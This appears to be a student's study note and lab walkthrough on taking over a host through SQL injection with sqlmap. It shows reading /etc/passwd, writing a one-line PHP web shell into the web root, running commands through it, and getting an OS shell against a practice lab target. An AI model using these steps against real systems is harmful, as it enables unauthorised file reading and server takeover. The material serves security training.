# File Read/Write - The first part of OS Exploitation through an SQL Injection vulnerability is reading and writing data on the hosting server - Reading data is much more common than writing data, which is strictly privileged in modern DBMSes, as it can lead to system exploitation, as we will see - For example, in MySql, to read local files, the DB user must have the privilege to `LOAD DATA` and `INSERT`, to be able to load the content of a file to a table and then reading that table - While we do not necessarily need to have DBA to read data, this is becoming more common in modern DBMSes ## Checking for DBA Privs ```bash sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba ``` ## Reading Local Files ```bash sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" ``` ## Writing Local Files - When it comes to writing files to the hosting server, it becomes much more restricted in modern DMBSes, since we can utilize this to write a Web Shell on the remote server, and hence get code execution and take over the server - This is why modern DBMSes disable file-write by default and need certain privileges for DBA's to be able to write files - For example, in MySql, the `--secure-file-priv` configuration must be manually disabled to allow writing data into local files using the `INTO OUTFILE` SQL query, in addition to any local access needed on the host server, like the privilege to write in the directory we need - However, many web apps require the ability for DBMSes to write data into files, so it is worth testing whether we can write files to the remote server - To do that with SQLMap, we can use the `--file-write` and `--file-dest` options - Preparing a simple php webshell ```bash echo '<?php system($_GET["cmd"]); ?>' > shell.php ``` - Attempt to write `shell.php` within the `/var/www/html/` directory on the webserver ```bash sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" ``` - Now attempt to use the webshell ```bash curl http://www.example.com/shell.php?cmd=ls+-la ``` # OS Command Execution - SQLMap utilizes various techniques to get a remote shell through SQL injection vulnerabilities, like writing a remote shell, as we just did, writing SQL functions that execute commands and retrieve output or even using some SQL queries that directly execute OS command, like `xp_cmdshell` in Microsoft SQL Server - To get an OS shell with SQLMap, we can use the `--os-shell` option ```bash sqlmap -u "http://www.example.com/?id=1" --os-shell ``` # Exercise - Use SQLi vulnerability in GET parameter id to exploit the host OS ## Read flag.txt - Try to use SQLMap to read the file `/var/www/html/flag.txt` - First, check DBA privs - TRUE ```bash sqlmap -u "http://94.237.51.160:36246/?id=1" --is-dba ``` ![[images/Pasted image 20251209204255.png]] - Second, try to read flag - GUCCI ```bash sqlmap -u "http://94.237.51.160:36246/?id=1" --file-read "/var/www/html/flag.txt" ``` ![[images/Pasted image 20251209204448.png]] ## Gain an interactive OS Shell - Attempt to upload PHP webshell ```bash echo '<?php system($_GET["cmd"]); ?>' > shell.php cat shell.php <?php system($_GET["cmd"]); ?> sqlmap -u "http://94.237.51.160:36246/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" ``` ![[images/Pasted image 20251209204708.png]] - Attempt to interact with webshell - SUCCESS! ```bash curl http://94.237.51.160:36246/shell.php?cmd=id ``` ![[images/Pasted image 20251209204918.png]] - Navigate to flag and grab - BAM ![[images/Pasted image 20251209205202.png]]